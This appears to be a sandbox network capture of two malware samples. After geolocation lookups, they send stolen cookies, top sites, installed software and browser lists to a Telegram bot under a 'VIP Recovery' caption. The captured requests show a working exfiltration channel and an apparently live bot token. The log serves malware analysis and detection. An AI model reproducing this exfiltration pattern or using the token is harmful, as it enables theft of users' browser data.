2024-10-07 20:41:23 UTC	675	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 20:41:23 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 15 Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OKplZigddCp5VYXFvBMxChuI%2FyBSH8ICcEdMN0PR1VrydTz4faudhC8ybmcHtmLpT6bTX0Tab%2FDQPfG2NERs%2BvgIxj2ebBMPGIhw33DIEZ2Nh1w8xEJBBy%2BH9hJWCMHu2uXkYeSC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf0b633b8888cba-EWR
2024-10-07 20:41:23 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 20:41:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.8	49749	188.114.97.3	443	8064	C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 20:41:25 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-07 20:41:25 UTC	675	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 20:41:25 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 17 Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4gY%2BgcEsUPEu6da53WCEhZyAWt0f6guyswYrPoySf2vhg5Cxa99PHyoUYzN%2Fm%2F4b6FvNwy0VJ7YOPL2rv8SKcm5mzjYaqNfPj4i%2BtcAe8EUb3oz60Ch4V1b4LjD79bGDIT51W1z1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf0b63d2f93c34e-EWR
2024-10-07 20:41:25 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 20:41:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.8	49750	149.154.167.220	443	8064	C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 20:41:26 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:258555%0D%0ADate%20and%20Time:%2008/10/2024%20/%2010:10:37%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20258555%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-10-07 20:41:26 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 07 Oct 2024 20:41:26 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-07 20:41:26 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.8	52177	149.154.167.220	443	7772	C:\Users\user\Desktop\EUYIlr7uUX.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 20:42:38 UTC	376	OUT	POST /bot7207203688:AAH7zD-WPsi2BXK6KyZWdSEeTTm6Kjd9c5o/sendDocument?chat_id=1193226784&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcea7e323b4b56 Host: api.telegram.org Content-Length: 1257 Connection: Keep-Alive
2024-10-07 20:42:38 UTC	1257	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 61 37 65 33 32 33 62 34 62 35 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 43 6f 6f 6b 69 65 73 20 7c 20 68 75 62 65 72 74 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 35 38 35 35 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 30 37 2f 31 30 2f 32 30 32 34 20 Data Ascii: --------------------------8dcea7e323b4b56Content-Disposition: form-data; name="document"; filename="Cookies_Recovered.txt"Content-Type: application/x-ms-dos-executableCookies \| user \| VIP Recovery PC Name:258555Date and Time: 07/10/2024
2024-10-07 20:42:38 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 07 Oct 2024 20:42:38 GMT Content-Type: application/json Content-Length: 533 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-07 20:42:38 UTC	533	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 34 32 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 30 37 32 30 33 36 38 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 6e 65 61 6b 30 30 30 37 36 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 6e 65 61 6b 30 30 30 37 36 38 38 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 31 39 33 32 32 36 37 38 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 54 6f 6e 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 74 6f 6e 79 30 30 30 39 39 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 38 33 33 33 37 35 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c Data Ascii: {"ok":true,"result":{"message_id":6424,"from":{"id":7207203688,"is_bot":true,"first_name":"sneak0007688","username":"sneak0007688_bot"},"chat":{"id":1193226784,"first_name":"Tony","username":"tony00099","type":"private"},"date":1728333758,"document":{"fil

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.8	52179	149.154.167.220	443	8064	C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 20:42:41 UTC	376	OUT	POST /bot7207203688:AAH7zD-WPsi2BXK6KyZWdSEeTTm6Kjd9c5o/sendDocument?chat_id=1193226784&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcea80a4ac6638 Host: api.telegram.org Content-Length: 1257 Connection: Keep-Alive
2024-10-07 20:42:41 UTC	1257	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 61 38 30 61 34 61 63 36 36 33 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 43 6f 6f 6b 69 65 73 20 7c 20 68 75 62 65 72 74 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 35 38 35 35 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 30 37 2f 31 30 2f 32 30 32 34 20 Data Ascii: --------------------------8dcea80a4ac6638Content-Disposition: form-data; name="document"; filename="Cookies_Recovered.txt"Content-Type: application/x-ms-dos-executableCookies \| user \| VIP Recovery PC Name:258555Date and Time: 07/10/2024
2024-10-07 20:42:42 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 07 Oct 2024 20:42:41 GMT Content-Type: application/json Content-Length: 533 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-07 20:42:42 UTC	533	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 34 32 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 30 37 32 30 33 36 38 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 6e 65 61 6b 30 30 30 37 36 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 6e 65 61 6b 30 30 30 37 36 38 38 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 31 39 33 32 32 36 37 38 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 54 6f 6e 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 74 6f 6e 79 30 30 30 39 39 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 38 33 33 33 37 36 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c Data Ascii: {"ok":true,"result":{"message_id":6425,"from":{"id":7207203688,"is_bot":true,"first_name":"sneak0007688","username":"sneak0007688_bot"},"chat":{"id":1193226784,"first_name":"Tony","username":"tony00099","type":"private"},"date":1728333761,"document":{"fil

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.8	52181	149.154.167.220	443	7772	C:\Users\user\Desktop\EUYIlr7uUX.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 20:42:45 UTC	352	OUT	POST /bot7207203688:AAH7zD-WPsi2BXK6KyZWdSEeTTm6Kjd9c5o/sendDocument?chat_id=1193226784&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ATopSites%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcef197cbf1342 Host: api.telegram.org Content-Length: 919
2024-10-07 20:42:45 UTC	919	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 66 31 39 37 63 62 66 31 33 34 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 54 6f 70 53 69 74 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 54 6f 70 53 69 74 65 73 20 7c 20 68 75 62 65 72 74 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 35 38 35 35 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 30 37 2f 31 30 2f 32 30 32 Data Ascii: --------------------------8dcef197cbf1342Content-Disposition: form-data; name="document"; filename="TopSites_Recovered.txt"Content-Type: application/x-ms-dos-executableTopSites \| user \| VIP Recovery PC Name:258555Date and Time: 07/10/202
2024-10-07 20:42:46 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 07 Oct 2024 20:42:45 GMT Content-Type: application/json Content-Length: 534 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-07 20:42:46 UTC	534	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 34 32 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 30 37 32 30 33 36 38 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 6e 65 61 6b 30 30 30 37 36 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 6e 65 61 6b 30 30 30 37 36 38 38 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 31 39 33 32 32 36 37 38 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 54 6f 6e 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 74 6f 6e 79 30 30 30 39 39 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 38 33 33 33 37 36 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c Data Ascii: {"ok":true,"result":{"message_id":6426,"from":{"id":7207203688,"is_bot":true,"first_name":"sneak0007688","username":"sneak0007688_bot"},"chat":{"id":1193226784,"first_name":"Tony","username":"tony00099","type":"private"},"date":1728333765,"document":{"fil

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.8	52183	149.154.167.220	443	7772	C:\Users\user\Desktop\EUYIlr7uUX.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 20:42:54 UTC	389	OUT	POST /bot7207203688:AAH7zD-WPsi2BXK6KyZWdSEeTTm6Kjd9c5o/sendDocument?chat_id=1193226784&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0AInstalled%20Softwares%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcf1f0d65aa325 Host: api.telegram.org Content-Length: 993 Connection: Keep-Alive
2024-10-07 20:42:54 UTC	993	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 31 66 30 64 36 35 61 61 33 32 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 49 6e 73 74 61 6c 6c 65 64 53 6f 66 74 77 61 72 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 49 6e 73 74 61 6c 6c 65 64 53 6f 66 74 77 61 72 65 73 20 7c 20 68 75 62 65 72 74 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 35 38 35 35 35 0d 0a 44 61 74 65 Data Ascii: --------------------------8dcf1f0d65aa325Content-Disposition: form-data; name="document"; filename="InstalledSoftwares_Recovered.txt"Content-Type: application/x-ms-dos-executableInstalledSoftwares \| user \| VIP Recovery PC Name:258555Date
2024-10-07 20:42:54 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 07 Oct 2024 20:42:54 GMT Content-Type: application/json Content-Length: 555 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-07 20:42:54 UTC	555	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 34 32 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 30 37 32 30 33 36 38 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 6e 65 61 6b 30 30 30 37 36 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 6e 65 61 6b 30 30 30 37 36 38 38 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 31 39 33 32 32 36 37 38 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 54 6f 6e 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 74 6f 6e 79 30 30 30 39 39 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 38 33 33 33 37 37 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c Data Ascii: {"ok":true,"result":{"message_id":6427,"from":{"id":7207203688,"is_bot":true,"first_name":"sneak0007688","username":"sneak0007688_bot"},"chat":{"id":1193226784,"first_name":"Tony","username":"tony00099","type":"private"},"date":1728333774,"document":{"fil

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.8	52185	149.154.167.220	443	8064	C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 20:43:04 UTC	352	OUT	POST /bot7207203688:AAH7zD-WPsi2BXK6KyZWdSEeTTm6Kjd9c5o/sendDocument?chat_id=1193226784&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ATopSites%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcee7481a05c80 Host: api.telegram.org Content-Length: 919
2024-10-07 20:43:04 UTC	919	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 65 37 34 38 31 61 30 35 63 38 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 54 6f 70 53 69 74 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 54 6f 70 53 69 74 65 73 20 7c 20 68 75 62 65 72 74 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 35 38 35 35 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 30 37 2f 31 30 2f 32 30 32 Data Ascii: --------------------------8dcee7481a05c80Content-Disposition: form-data; name="document"; filename="TopSites_Recovered.txt"Content-Type: application/x-ms-dos-executableTopSites \| user \| VIP Recovery PC Name:258555Date and Time: 07/10/202
2024-10-07 20:43:05 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 07 Oct 2024 20:43:04 GMT Content-Type: application/json Content-Length: 535 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-07 20:43:05 UTC	535	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 34 32 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 30 37 32 30 33 36 38 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 6e 65 61 6b 30 30 30 37 36 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 6e 65 61 6b 30 30 30 37 36 38 38 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 31 39 33 32 32 36 37 38 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 54 6f 6e 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 74 6f 6e 79 30 30 30 39 39 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 38 33 33 33 37 38 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c Data Ascii: {"ok":true,"result":{"message_id":6428,"from":{"id":7207203688,"is_bot":true,"first_name":"sneak0007688","username":"sneak0007688_bot"},"chat":{"id":1193226784,"first_name":"Tony","username":"tony00099","type":"private"},"date":1728333784,"document":{"fil

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.8	52186	149.154.167.220	443	7772	C:\Users\user\Desktop\EUYIlr7uUX.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 20:43:05 UTC	388	OUT	POST /bot7207203688:AAH7zD-WPsi2BXK6KyZWdSEeTTm6Kjd9c5o/sendDocument?chat_id=1193226784&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0AInstalled%20Browsers%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcf4fcc4666adb Host: api.telegram.org Content-Length: 953 Connection: Keep-Alive
2024-10-07 20:43:05 UTC	953	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 34 66 63 63 34 36 36 36 61 64 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 49 6e 73 74 61 6c 6c 65 64 42 72 6f 77 73 65 72 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 49 6e 73 74 61 6c 6c 65 64 42 72 6f 77 73 65 72 73 20 7c 20 68 75 62 65 72 74 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 35 38 35 35 35 0d 0a 44 61 74 65 20 61 Data Ascii: --------------------------8dcf4fcc4666adbContent-Disposition: form-data; name="document"; filename="InstalledBrowsers_Recovered.txt"Content-Type: application/x-ms-dos-executableInstalledBrowsers \| user \| VIP Recovery PC Name:258555Date a
2024-10-07 20:43:05 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 07 Oct 2024 20:43:05 GMT Content-Type: application/json Content-Length: 553 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
